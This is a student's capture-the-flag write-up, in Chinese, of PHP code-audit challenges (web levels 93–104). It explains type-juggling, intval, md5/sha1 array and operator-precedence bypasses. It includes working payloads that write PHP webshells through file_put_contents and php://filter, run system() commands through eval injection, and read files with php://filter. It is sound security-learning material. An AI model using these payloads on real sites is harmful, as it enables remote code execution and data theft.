这周要学习的是php代码审计 根据师兄的作业 来做web入门的93-104关

93关

看代码 进行分析

他的主函数

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }

 解析：

输入一个变量 num 进行get传参 如果num=4476 返回错误 

传入num 用函数preg_match进行匹配，如果匹配到则返回错误

再根据intval函数的取整的特性，传入payload：?num=4476.1/?num=010574(加0是因为intval 函数检测时字符串以 "0" 开始，使用 8 进制)

知识点：

php中使用两个等号“==” 比较，只比较值，不比较类型(两个等号是弱类型比较,他会将两边自动转换为同一种类型后再进行比较。所以他比较的就只是值 ,不比较类型。)

intval 函数用于获取变量的整数值，intval() 函数通过使用指定的进制 base 转换（默认是十进制），返回变量 var 的 integer 数值。

如果 base 是 0，通过检测 var 的格式来决定使用的进制：

• 如果字符串包括了 "0x" (或 "0X") 的前缀，使用 16 进制 (hex)；否则，
• 如果字符串以 "0" 开始，使用 8 进制(octal)；否则，
• 将使用 10 进制 (decimal)。

实例：

<?php
echo intval(42);                      // 42
echo intval(4.2);                     // 4
echo intval('42');                    // 42
echo intval('+42');                   // 42
echo intval('-42');                   // -42
echo intval(042);                     // 34
echo intval('042');                   // 42
echo intval(1e10);                    // 1410065408
echo intval('1e10');                  // 1
echo intval(0x1A);                    // 26
echo intval(42000000);                // 42000000
echo intval(420000000000000000000);   // 0
echo intval('420000000000000000000'); // 2147483647
echo intval(42, 8);                   // 42
echo intval('42', 8);                 // 34
echo intval(array());                 // 0
echo intval(array('foo', 'bar'));     // 1
?>

94关

 只比93关多了一个  !strpos($num, "0")

知识点：

strpos() 函数查找字符串在另一字符串中第一次出现的位置（区分大小写）。

解析：

我们还是可以利用8进制进行绕过或者小数绕过，但是因为strpos函数特性 要在8进制前加+或者加空格 ，小数应该是0 payload:?num=4476.0/?num=+010574

95关

解析：

  if(preg_match("/[a-z]/i", $num)){

 if(preg_match("/[a-z]|\./i", $num)){  95关

与之前不同的地方在正则匹配这里，多了一个. 其他的没变

还是用之前的payload：?num=+010574

96关

 

知识点：

这题看到了flag.php 应该是让我们找文件路径的题，找文件路径可以用

php伪协议filter

/var/www/html/flag.php(/var/www/html 只是Web服务器的默认根文件夹)

./flag.php(在linux下面表示当前目录是 "./" " . ./"代表上一层目录 “/”:代表根目录.)

解析：

payload：/var/www/html/flag.php    ./flag.php    php://filter/resource=flag.php

php://filter/read=convert.base64-encode/resource=flag.php (base64编码的伪协议使用)

97关

 知识点：

属于php md5强比较绕过

在 php 中，=== 代表着强比较，不仅仅会比较值，还会比较类型。因此这里不能在使用上面的方式进行绕过了。

要绕过此处的比较，需要向 md5() 函数中传入数组，md5() 函数中如果传入的不是字符串而是数组，不但md5()函数不会报错，结果还会返回null，在强比较里面null=null为 True 绕过。

解析：

因此这里可以使用数组绕过

payload:a[]=1&b[]=2

是post传参而不是get传参

98关

知识点：

php三元换算符

解析：

 $_GET?$_GET=&$_POST:'flag' 如果存在GET请求，则用POST请求传入的值将其覆盖掉.

$_GET['HTTP_FLAG']=='flag'?$flag:__FILE__ GET传入的HTTP_FLAG的值为flag，则输出flag.

所以POST：HTTP_FLAG=flag；GET随便传什么都行.

 

99关

 知识点：

array函数

array_push函数

 in_array函数

file_put_contents() 函数把一个字符串写入文件中。

该函数访问文件时，遵循以下规则：

1. 如果设置了 FILE_USE_INCLUDE_PATH，那么将检查 *filename* 副本的内置路径
2. 如果文件不存在，将创建一个文件
3. 打开文件
4. 如果设置了 LOCK_EX，那么将锁定文件
5. 如果设置了 FILE_APPEND，那么将移至文件末尾。否则，将会清除文件的内容
6. 向文件中写入数据
7. 关闭文件并对所有文件解锁

如果成功，该函数将返回写入文件中的字符数。如果失败，则返回 False。

解析：

通过看这三个函数，知道了$allow = array()是设置了数组

0x36d是877的十六进制。for语句是一个循环结构，$i从36开始，每次与877作比较，只要小于877，则让$i加1。每次for语句执行成功，也就是加1都会执行下面的array_push函数。

array_push($allow, rand(1,$i))是在1-$i之间随机生成一个整数，添加到数组$allow尾部

if(isset($_GET['n']) && in_array($_GET['n'], $allow)) 从这里可以看出in_array函数使用的是弱比较 因为他没有设置第三个参数为true 所以我们传入1.php就相当于传入了1 这里也是这题的主要考点

file_put_contents($_GET['n'], $_POST['content']); 这句话就是get传参并用post传入内容

所以post就可以传入命令执行语句，get传入1.php就可以绕过，因为数字1正好在 range(1,24)数组中，当随机生成的数字正好是1时就可以绕过 in_array()函数判断

解析：

payload： get： ?n=1.php   post:  content=<?php system('ls');?>

传入以后就可以找到1.php的页面执行命令找到了存放flag的文件

再用2.php读取flag文件

 

100关

 知识点：

考察的是运算符的优先级  ：&& > || > = > and > or

运算符优先级的划分如下：

()小括号优先级最高

！ 优先级高于 算术运算符

算术运算符 优先级高于 关系运算符

关系运算符优先级高于 "&&"和"||"

"&&"和"||"优先级高于 "="

运算符的种类还有很多，在往后的学习中我们就会慢慢地接触到，所以，在同一行代码中，

如果出现多种不同优先级的运算符时，最好还是加上小括号，这样才会比较直观。

(３)同等优先级的运算符，执行顺序的划分：

算术运算符 —— 乘法、除法、取余运算 优先级高于 加法、减法。

算术运算符 —— 乘法、除法、取余运算 出现在同一行代码中，则按从左到右的顺序执行。

算术运算符 —— 加法、减法， 出现在同一行代码中，则按从左到右的顺序执行。

关系运算术——出现在同一行代码中，按从左往右顺序执行。

 

​ 

 解析：

is_numeric函数 用于检测变量是否为数字或数字字符串

$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3); 关键在这句

因为=比and优先 所以v0的值是v1赋的 所以v0=is_numeric($v1) 看到代码后面有eval函数

想到命令执行

这需要$v2传入命令，$v3需要;结尾，但这么一来is_numeric一处理就变成了

$vo = $v1 and FALSE and FAlse

if(!preg_match("/\;/", $v2)){
        if(preg_match("/\;/", $v3))

再根据这两句，v2必须没有；v3必须有；

payload： /?v1=1&v2=system('ls')&v3=;

找到了包含flag的文件 但是点开什么都没有 打开ctfshow.php看看

/?v1=1&v2=system('tac ctfshow.php')&v3=;     （这里用tac的原因是发现cat不行然后换了一下）

发现了flag 0x2d是16进制的- 转换一下就好了

101关

 

不一样的地方在于把v2 v3的条件给改了

if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\)|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\;|\?|[0-9]/", $v2)){
if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\(|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\?|[0-9]/", $v3)){

知识点

新学习到了反射

反射，通俗来讲就是可以通过一个对象来获取所属类的具体内容，php中内置了强大的反射API：

    ReflectionClass：一个反射类，功能十分强大，内置了各种获取类信息的方法，创建方式为new ReflectionClass(str 类名)，可以用echo new ReflectionClass(‘className’)打印类的信息。

    ReflectionObject：另一个反射类，创建方式为new ReflectionObject(对象名)。

 

API：API 就是应用程序编程接口。它是能用来操作组件、应用程序或者操作系统的一组函数

php反射类_php 反射类_raoxiaoya的博客-CSDN博客具体的可以看这个大佬的博客 就不做具体说明了

所以我们在这里可以直接用反射类的方法来做这道题

解析:

payload：?v1=1&v2=echo new ReflectionClass&v3=;

这里的flag是少了一位的 可以用bp抓包爆破 也可以一个一个字符尝试

102关

 

 知识点：

substr() 函数返回字符串的一部分。

注释：如果 start 参数是负数且 length 小于或等于 start，则 length 为 0。

 call_user_func()：调用一个回调函数处理字符串,
可以用匿名函数，可以用有名函数，可以传递类的方法，
用有名函数时，只需传函数的名称
用类的方法时，要传类的名称和方法名
传递的第一个参数必须为函数名，或者匿名函数，或者方法
其他参数，可传一个参数，或者多个参数，这些参数会自动传递到回调函数中
而回调函数，可以通过传参，获取这些参数
返回回调函数处理后的结果

【php】php中call_user_func函数的用法_call_user_func用在什么时候_yanhui_wei的博客-CSDN博客

解析：

<?phphighlight_file(__FILE__);$v1 = $_POST['v1'];$v2 = $_GET['v2'];$v3 = $_GET['v3'];$v4 = is_numeric($v2) and is_numeric($v3); 
 通过将变量v2执行的命令base64加密后转换成16进制字符串来使得变量v4为ture 
if($v4){    $s = substr($v2,2);   $str = call_user_func($v1,$s);
通过变量v1调用hex2bin函数将变量v2的16进制字符串转换成原来的base64编码形式（因为这里v2只使用数字 并且是在第二位之后即第三位开始读取suo'y）
echo $str;    file_put_contents($v3,$str);
通过使用php://filter伪协议写入webshell

get传参v2和v3，post传参v1；if中需要v4为真才能往下执行，而v4要为真就是v2传的参数要为数字或者数字字符串，同时v2也是我们要写入的webshell，为了让v2为数字或者数字字符串，我们可以先把我们的webshell转换为base64编码，再把base64编码转换为16进制，这是一种办法去转换成数字。

payload：

get：?v2=005044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=1.php

post： v1=hex2bin

(<?=`cat *`;——base64：PD89YGNhdCAqYDs=——16进制：5044383959474e6864434171594473) （v3为伪协议）

 

在访问1.php 得到flag

 103关

看代码发现和102关没什么区别 该绕过的都用base64以及16进制绕过了 可以沿用102关的payload

都是在页面的源代码里找到的flag

104关

 知识点：

sha1()函数特性，sha1函数无法处理数组，遇到数组会返回NULL

解析：

get传入v2 post传入v1 让两个变量的sha1值相等 用的是弱比较

payload： get： v2[]=1  post: v1[]=1

得到flag

php代码审计作业题到此结束 通过这些题也找到了代码审计方面的做题思路，一些不认识的函数也认识了不少 但是不足也很明显，好多函数的特性并没有了解过，看到简单的代码还行 如果有复杂的代码还是头大 欠缺的地方很多 到实际的时候也没有那么多时间让你去查函数  还是要花功夫去记函数的